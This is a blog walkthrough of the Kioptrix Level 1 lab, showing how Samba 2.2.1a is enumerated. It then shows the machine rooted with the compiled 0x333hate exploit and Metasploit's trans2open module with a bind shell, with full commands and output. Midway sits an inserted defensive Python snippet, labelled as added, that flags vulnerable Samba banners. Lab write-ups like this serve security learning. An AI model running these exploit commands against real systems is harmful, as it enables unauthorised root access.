Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)


Hi everyone, this is the second part of Level 1; this time we are going to exploit Samba. As you may remember from the last video, we got root using an SSL exploit for Apache, so now it's time to exploit a Samba vulnerability. Let's start.
First, let's run an nmap service scan:
nmap -sV 172.16.1.144
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-07 11:12 BST
Nmap scan report for 172.16.1.144
Host is up (0.00068s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd (workgroup: MYGROUP)
MAC Address: 00:50:56:AF:5A:B9 (VMware)
OK, this output doesn't tell us the Samba version, but we can try two commands
to list it:
1) smbclient -L 172.16.1.144
Result:
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
 Sharename       Type      Comment
 ---------       ----      -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error
ERRnosupport
 IPC$            IPC       IPC Service (Samba Server)
 ADMIN$          Disk      IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

2) smbclient //172.16.1.144/IPC$
Result:
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: ERRnosuchshare
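As an added illustration (not part of the original post): the nmap service scan above reports only "Samba smbd", while the smbclient banner gives the exact release, so a defender auditing a network can parse that banner line and flag hosts running a release older than the one carrying the fix for the trans2open overflow used later in this post. The threshold release (2.2.8a) is an assumption here; check it against the Samba release notes for your environment.

```python
import re

# Banner line printed by smbclient, e.g. "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]"
BANNER_RE = re.compile(r"Server=\[Samba ([0-9][0-9.]*[a-z]?)\]")

# Assumption: the first 2.2.x release carrying the trans2open fix.
# Verify against the Samba release notes before relying on it.
FIXED_VERSION = "2.2.8a"


def parse_version(ver):
    """Turn '2.2.1a' into a comparable tuple: (2, 2, 1, 'a')."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]?)", ver)
    if not m:
        raise ValueError(f"unrecognised Samba version: {ver!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch), suffix)


def samba_version(output):
    """Extract the Samba version string from smbclient output, or None."""
    m = BANNER_RE.search(output)
    return m.group(1) if m else None


def assess(output, fixed=FIXED_VERSION):
    """Return a finding dict for smbclient output captured from one host."""
    ver = samba_version(output)
    if ver is None:
        return {"version": None, "vulnerable": None, "reason": "no Samba banner found"}
    vulnerable = parse_version(ver) < parse_version(fixed)
    reason = (f"Samba {ver} is older than {fixed}" if vulnerable
              else f"Samba {ver} is at or above {fixed}")
    return {"version": ver, "vulnerable": vulnerable, "reason": reason}


# Sample output copied from the smbclient -L run against the lab VM above.
SAMPLE = """Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
 Sharename       Type      Comment
 ---------       ----      -------
"""

if __name__ == "__main__":
    print(assess(SAMPLE))
```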
OK, now we know it's running version 2.2.1a, so let's try to find an exploit for
it. If you google for "samba 2.2.1a" exploit,
you will find this one:
http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
So, let's go back to our BackTrack box, then download and compile it.
wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
gcc -o exploit 0x333hate.c
./exploit  -t 172.16.1.144
Result:
[~] 0x333hate => samba 2.2.x remote root exploit [~]
 [~]        coded by c0wboy ~ www.0x333.org       [~]
 [-] connecting to 172.16.1.144:139
 [-] stating bruteforce
 [-] testing 0xbfffffff
 [-] testing 0xbffffdff
 [-] testing 0xbffffbff
 [-] testing 0xbffff9ff
 [-] testing 0xbffff7ff
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)


There is another way to exploit this Samba version, using Metasploit. Let's try that.
msfconsole
search samba
use linux/samba/trans2open
show options
set RHOST 172.16.1.144
show payloads
set PAYLOAD linux/x86/shell/bind_tcp
show options
exploit
[*] Started bind handler
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 172.16.1.144
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (172.16.1.79:52832 -> 172.16.1.144:4444) at
2012-08-07 11:51:46 +0100
id
uid=0(root) gid=0(root) groups=99(nobody)


Success!! We got root on the box again.
